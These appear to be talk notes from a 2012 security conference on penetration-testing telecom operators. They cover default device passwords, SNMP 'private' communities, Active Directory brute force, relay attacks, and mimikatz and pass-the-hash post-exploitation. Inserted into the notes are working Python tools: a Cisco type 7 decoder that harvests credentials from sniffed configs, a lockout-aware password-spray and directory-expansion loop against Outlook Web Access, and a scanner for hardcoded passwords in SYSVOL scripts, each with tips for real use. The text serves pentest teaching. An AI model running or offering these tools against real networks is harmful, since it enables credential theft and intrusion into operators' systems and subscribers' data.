phdays.com, phdays.ru Moscow, 2012, Day 2, Track 1, 17:00
Sergey Gordeychik, "How to hack a telecom and stay alive 2" (talk notes)

Owning a billing (the first 20 minutes of the talk were lost)

Lots of VPN
- VPN is good, but it needs a GOOD configuration.

The lords of the net: admins!
- A large network = MANY admins.
- Web-accessible KVM/RDP.
- Many servers = admin passwords, and there is never a lock-out policy.
- TCP 1337 over SSL turned out to be a ShoutCast radio streaming server. Location: an administrator's workstation. Just search his email for the word "password".
- WiFi access: WEP instead of WPA; the reason given was "WPA is slow". Since WEP is fast, the password cracking was fast as well :)
- Found VoIP: Cisco Call Manager, privilege level 15 for the network.

Pentester tips
- Don't miss anything on the perimeter: a strange service you are not able to fingerprint might in fact be a very BIG hole.
- Keep 3rd-party hosts in mind.
- Use old-school tools and techniques: sometimes old holes are found while the newest threats are patched.
- Checking the WEB is necessary.
- Don't forget the admin side.

Subscribers
- Subscribers are WITHIN the perimeter of the network; many attacks are easier to perform from the subscriber side.
- General problems: network access control weakness, intransigent attacks, protection of the equipment, web applications for subscribers (e.g. play online games, manage the account, etc.).
Network access control errors
- Scanned 192.168.x.x: port 22 (ssh) was open although 23 (telnet) was closed; 445/udp (SMB share) was still open although 445/tcp was closed.
- Some Cisco devices had default passwords, which subsequently led to some passport server passwords, which got us more Cisco passwords, etc.

Hosting
- Local network for colocated/dedicated servers.
- Attacks against infrastructure (DNS), e.g. Secunia was hacked via DNS spoofing.
- Shared hosting.

Network access control errors (mobile)
- GPRS/EDGE/3G traditionally sticks to NAT, so other clients are invisible. This is not always true: perhaps due to configuration errors, other subscribers could be seen in the 10.x subnet.
- A lot of unpatched M2M devices (kiosks) sit behind NAT with the logic "behind NAT = unhackable".
- SNMP community 'private' on a GGSN. (Joke slide: a barcode.)
- Captive portal (shown when the credit for net usage expires): LAMP, but mod_proxy was enabled, so it could be used as a proxy, and the proxy leads to the backbone/technological network -> pwn!
- Web portals and services for subscribers are often placed in the DMZ together with OTHER special servers.
- Subscribers also reuse passwords, or a flawed SSO is installed. E.g. a games server: Proxima CMS, path traversal + SQLi + configuration error = root. Found 20 other web apps on the same machine, all of them used for subscriber access.

Contractors
- Perimeter-level attacks require system access; corporate VPN policies are not applicable (in the proper sense): just connect and get your work done.
- E.g. a host was looking for a WiFi AP; we brought up a fake AP; the host connected to the fake AP; the host allowed guest access in Windows; the host had the distribution kit for DSL subscribers; the password was in the kit; the password matched the production xDSL management software.
- E.g. some contractors are external: a screenshot with a Chinese cmd.exe window.

Pentester tips
- The contractor's laptop is NOT a telecom asset, it IS a contractor asset; subscriber data is NOT telecom data. So it is important to know what belongs to the telecom and what does NOT.
- We are ONLY searching for vulnerabilities, we exploit a vulnerability MINIMALLY, and we use ONLY our own resources for demos.
- A fickle client. Client: "enter the portal, abuse the leaked password, send me the screenshot". Pentester: "NO, here is the password, go enter yourself and check it". Contractors are never to be hacked!

Playing inside
- The network changes are highly dynamic; some errors can cause failures and facilitate fraud.
- Going ahead while inside the network: find things to break? Better: own the directory and own the net. Owning the net gets you traffic, and traffic gets you passwords. Owning the directory gets you passwords, etc.

Owning the NET
- Equipment vulnerabilities: Cisco, Huawei; it is a real hassle to update/patch them.
- FORGOTTEN (!) systems. Example: they found a switch that was NOT configured. FUN part: NOT configured, BUT uptime 2 years! The pentesters configured it :) "properly" configured, etc.
- Example: found a WPA-PSK AP. Hard time physically finding the given AP: it is inside the data center and gives access directly to the telecom without any hacks.
- Backups: configuration backups are often pulled over the net; just sniff and collect the passwords.

Owning the directory
- Scenario 1: brute force. Some default passwords work for a bootstrap list of Outlook Web Access users. Once Outlook Web Access is obtained, it gets us the list of users from the directory; expand the list of users to brute force; go back to step 1. Once inside the network, use a NULL session to get the list of users and go back to step 1.
- Scenario 4: relay attacks. Don't forget to use them. They cannot be conceptually patched: by design of challenge-response there is no authentication of the server (as there is in Kerberos).
- Scenario 5: the service desk, again.
- Scenario N: works well in 50% of cases. Get into the SYSVOL share on the server; any user on the net is authorised to see it. Sometimes you find scripts with a password hardcoded in (or changed in) the script itself.
- Post-exploitation: Incognito (access token manipulation); pass-the-hash for Windows; mimikatz in Metasploit.
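The "default Cisco passwords" and "SNMP 'private' on a GGSN" findings above, together with the point that configuration backups pulled over the net in clear text can simply be sniffed, all come down to parsing an IOS running-config for credentials. The block below is an added example and not the speaker's tooling: it takes a constructed config (hostname, users, hashes and community strings are invented) as it would appear in a sniffed TFTP transfer, reverses the Cisco "type 7" passwords (a public, fixed-key XOR obfuscation, not encryption), separates out the type 5 hashes that still need offline cracking, and flags writable default SNMP communities.

```python
import re

# Cisco "type 7" is reversible obfuscation, not encryption: the XOR key is
# public and the first two decimal digits of the string are the seed offset.
_TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a Cisco type 7 password, e.g. '0822455D0A16' -> 'cisco'."""
    seed = int(encoded[:2])
    blob = bytes.fromhex(encoded[2:])
    return bytes(
        b ^ _TYPE7_KEY[(seed + i) % len(_TYPE7_KEY)] for i, b in enumerate(blob)
    ).decode("ascii")


# Constructed sample: a running-config as seen on the wire during a clear-text
# backup. All names, passwords, the hash and the community strings are invented.
SNIFFED_CONFIG = """\
hostname ggsn-test
enable secret 5 $1$Xy12$Qk7sB9Zt3hvYbWc1uXLmJ0
username admin password 7 1218011A1B055D5679
username backup privilege 15 password 7 051F0303244F4104
snmp-server community public RO
snmp-server community private RW
line vty 0 4
 password 7 02050D480809
 login
"""


def harvest_credentials(config: str) -> dict:
    """Pull every credential-bearing line out of an IOS config.

    Returns recovered clear-text type 7 passwords, hash lines that still need
    offline cracking (type 5 = md5crypt) and SNMP communities with their mode.
    """
    found = {"type7": {}, "hashed": [], "snmp": {}}
    for line in config.splitlines():
        line = line.strip()
        m = re.search(r"^username\s+(\S+).*?password\s+7\s+(\S+)", line)
        if m:
            found["type7"][f"user:{m.group(1)}"] = decode_type7(m.group(2))
            continue
        m = re.search(r"^password\s+7\s+(\S+)", line)  # vty / console lines
        if m:
            found["type7"]["line"] = decode_type7(m.group(1))
            continue
        m = re.search(r"^enable secret\s+5\s+(\S+)", line)
        if m:
            found["hashed"].append(("enable", m.group(1)))
            continue
        m = re.search(r"^snmp-server community\s+(\S+)\s+(RO|RW)", line)
        if m:
            found["snmp"][m.group(1)] = m.group(2)
    return found


def risky_snmp(found: dict) -> list:
    """Communities that are both guessable and writable (RW): a 'private' RW
    string on a GGSN means the device can be reconfigured, not just read."""
    return [c for c, mode in found["snmp"].items()
            if mode == "RW" and c.lower() in {"private", "public", "cisco"}]


if __name__ == "__main__":
    creds = harvest_credentials(SNIFFED_CONFIG)
    for who, pw in creds["type7"].items():
        print(f"{who}: {pw}")
    print("needs offline cracking:", creds["hashed"])
    print("writable default SNMP:", risky_snmp(creds))
```

Feed it the payload of a captured TFTP/FTP transfer (or a config found on a backup share) and you get the same list the talk describes: the type 7 strings fall out instantly, and only `enable secret 5` is worth a cracking run.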
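Scenario 1 above is really a fixed-point loop: spray a few default passwords over a bootstrap list, use any mailbox you get to read the directory, add the new names, and repeat until the user list stops growing. The block below is an added example, not the speaker's code; the OWA login and the address list are simulated in memory (accounts, names and passwords are constructed), and the two callables are the only thing a real run would swap out. The `max_attempts_per_user` budget is the practitioner caveat: the talk notes there was no lock-out policy at that site, but the same loop against a domain with one will lock every account in the directory.

```python
from collections import defaultdict

# Constructed sample environment (all names and passwords invented):
# an OWA-style login plus a directory that any authenticated user can read.
FAKE_ACCOUNTS = {
    "j.smith": "Welcome1",
    "helpdesk": "Password1",
    "n.petrov": "Welcome1",
    "svc-backup": "B4ckup!2012",
}
FAKE_GAL = ["j.smith", "helpdesk", "n.petrov", "svc-backup", "ceo", "a.ivanov"]


def fake_owa_login(user, password):
    """Stand-in for an HTTP form login against /owa; True on success."""
    return FAKE_ACCOUNTS.get(user) == password


def fake_fetch_gal(user, password):
    """Stand-in for pulling the address list with a valid mailbox."""
    return list(FAKE_GAL)


def spray_and_expand(seed_users, passwords, try_login, fetch_directory,
                     max_attempts_per_user=3):
    """Spray `passwords` over the known users, pull the directory with every
    success, add the new names and repeat until no new users appear.

    Returns (owned, users): owned maps user -> working password, users is the
    final expanded list. No user is ever tried more than
    max_attempts_per_user times, so set that below the lockout threshold.
    """
    users = list(dict.fromkeys(seed_users))   # ordered, de-duplicated
    tried = defaultdict(set)                  # user -> passwords attempted
    owned = {}
    while True:
        for user in list(users):
            if user in owned:
                continue
            for pw in passwords:
                if pw in tried[user]:
                    continue
                if len(tried[user]) >= max_attempts_per_user:
                    break                     # stay under the lockout budget
                tried[user].add(pw)
                if try_login(user, pw):
                    owned[user] = pw
                    break
        before = len(users)
        for user, pw in owned.items():        # "go back to step 1" with more names
            for name in fetch_directory(user, pw):
                if name not in users:
                    users.append(name)
        if len(users) == before:              # directory fully harvested
            return owned, users


if __name__ == "__main__":
    defaults = ["Welcome1", "Password1", "Summer2012"]
    owned, users = spray_and_expand(["j.smith", "helpdesk"], defaults,
                                    fake_owa_login, fake_fetch_gal)
    print("owned:", owned)
    print("directory size:", len(users))
```

Note that the loop only ever spends attempts on users not yet owned, so a second pass after a directory pull costs nothing on the accounts that already worked.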
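For the SYSVOL scenario, the work is grepping logon scripts that every domain user can read for the handful of ways a password gets embedded: `net use ... /user:DOMAIN\name secret`, a `--password` flag on a command line, a `set FOO_PW=` variable, or a quoted string assigned to a `strPassword`-style variable in VBScript. The block below is an added example and not the speaker's tooling; the three scripts are constructed (names, shares and secrets are invented) to exercise each pattern plus a harmless script that must produce no hit.

```python
import re

# Constructed sample: the kind of logon scripts that live under
# \\domain\SYSVOL\domain\scripts and are readable by every domain user.
SAMPLE_SCRIPTS = {
    "logon.bat": r"""@echo off
net use H: \\fs01\home$ /persistent:no
net use P: \\fs01\billing$ /user:CORP\svc_billing Bill1ng#2012
REM temporary, remove after migration
set ADMINPW=Summer2012!
"C:\Program Files\Backup\agent.exe" --server bk01 --password 0ldB4ckup
""",
    "mapdrive.vbs": r"""Set objNetwork = CreateObject("WScript.Network")
strPassword = "Ch4ngeMe!"
objNetwork.MapNetworkDrive "S:", "\\fs02\share", False, "CORP\helpdesk", strPassword
""",
    "clean.bat": r"""@echo off
del /q %TEMP%\*.tmp
""",
}

# (kind, pattern): every pattern names a `ctx` group (user, flag or variable)
# and a `secret` group with the clear-text value.
PATTERNS = [
    ("net use",    r"/user:(?P<ctx>\S+)\s+(?P<secret>\S+)"),
    ("cli flag",   r"(?i)(?P<ctx>--password|/password|-p)\s+(?P<secret>\S+)"),
    ("env var",    r"(?i)set\s+(?P<ctx>\w*(?:pass|pw|pwd)\w*)=(?P<secret>\S+)"),
    ("script var", r'(?i)(?P<ctx>\w*(?:pass|pwd)\w*)\s*=\s*"(?P<secret>[^"]+)"'),
]


def find_hardcoded_passwords(scripts):
    """Return (script, line_no, kind, context, secret) for each line that
    carries a clear-text password; the first matching pattern wins per line."""
    hits = []
    for name, body in scripts.items():
        for no, line in enumerate(body.splitlines(), 1):
            for kind, pat in PATTERNS:
                m = re.search(pat, line)
                if m:
                    hits.append((name, no, kind, m.group("ctx"), m.group("secret")))
                    break
    return hits


def secrets_by_script(hits):
    """Summarise hits as script -> sorted list of recovered secrets."""
    out = {}
    for name, _, _, _, secret in hits:
        out.setdefault(name, []).append(secret)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for hit in find_hardcoded_passwords(SAMPLE_SCRIPTS):
        print("%s:%d [%s] %s -> %s" % hit)
```

In practice point it at a mounted copy of the `scripts` and `Policies` folders (the Group Policy Preferences XML files there are a separate, well-known source of credentials); the patterns are deliberately loose, so expect to review the hits by hand.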
Billing
- Billing IT servers look like any other web server with a DB: unpatched Windows; Oracle with scott/tiger and no patches at all; IIS + ASP.NET.
- IMPORTANT: billing = confidential information of subscribers, so ask the telecom to give you a similar test system that does not contain confidential data.